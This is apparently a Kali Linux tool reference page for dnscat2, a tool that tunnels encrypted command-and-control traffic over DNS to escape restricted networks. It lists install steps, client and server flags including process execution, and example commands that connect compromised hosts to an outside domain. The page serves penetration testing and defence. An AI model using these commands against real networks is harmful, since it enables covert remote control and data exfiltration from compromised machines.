Post Exploitationdnstunnelc2command-and-controlnetwork

dnscat2

dnscat2 creates an encrypted command-and-control channel over the DNS protocol to tunnel out of restricted networks. It consists of a server for authoritative DNS and a client for compromised machines.

Description

dnscat2 is a DNS tunneling tool designed to establish encrypted command-and-control (C&C) channels over the DNS protocol, effective for bypassing network restrictions. The server component runs on an authoritative DNS server, while the client operates on compromised machines to create stealthy communication paths.

Use cases include post-exploitation scenarios where direct network access is blocked, allowing operators to maintain control through DNS queries that mimic legitimate traffic. The tool supports various DNS record types and configurations for flexibility in different network environments.

It is packaged as a metapackage with separate client and server components, each installable independently for targeted deployments.

How It Works

dnscat2 operates by encapsulating encrypted C&C traffic within DNS packets, leveraging record types like TXT, MX, CNAME, A, and AAAA. The server listens on specified host/port for DNS requests, processing them as tunneled data. The client on compromised hosts sends DNS queries to the server domain, with delays and steady timing to evade detection. Communication is encrypted, and streams support console I/O, process execution, or interactive commands.

Installation

bash

sudo apt install dnscat2

Flags

--help -hThis page.

--versionGet the version.

--delay <ms>Set the maximum delay between packets (default: 1000).

--steadyIf set, always wait for the delay before sending the next message.

--consoleSend/receive output to the console.

--exec -e <process>Execute the given process and link it to the stream.

--commandStart an interactive 'command' session (default).

--dns <options>Enable DNS mode with the given domain. Options include domain=<domain>, host=<hostname>, port=<port>, type=<type>, server=<server>.

-dDisplay more debug info (can be used multiple times).

-v, --versionGet the dnscat version (server).

-d, --dns=<s>Start a DNS server. Can optionally pass comma-separated name=value pairs (host, port, domain) (server).

Examples

Start dnscat client with DNS driver for the specified domain.

./dnscat --dns domain=skullseclabs.org

Start dnscat client targeting domain with upstream DNS server 8.8.8.8 on port 53.

./dnscat --dns domain=skullseclabs.org,server=8.8.8.8,port=53

Start dnscat client with DNS on non-standard port 5353.

./dnscat --dns domain=skullseclabs.org,port=5353

Start dnscat client using A and CNAME record types.

./dnscat --dns domain=skullseclabs.org,port=53,type=A,CNAME

Start dnscat with default DNS driver on port 53 using the provided hostname.

./dnscat skullseclabs.org

Start dnscat2 server on default host 0.0.0.0 and port 53 with no specific domain.

ruby dnscat2.rb

Start dnscat2 server listening for a particular domain.

ruby dnscat2.rb domain.com

Start dnscat2 server listening on multiple domains.

ruby dnscat2.rb a.com b.com c.com

Start dnscat2 server with custom host, port, and multiple domains.

ruby dnscat2.rb --dns 'host=127.0.0.1,port=53531,domain=a.com,domain=b.com'

Updated 2026-04-16kali.org ↗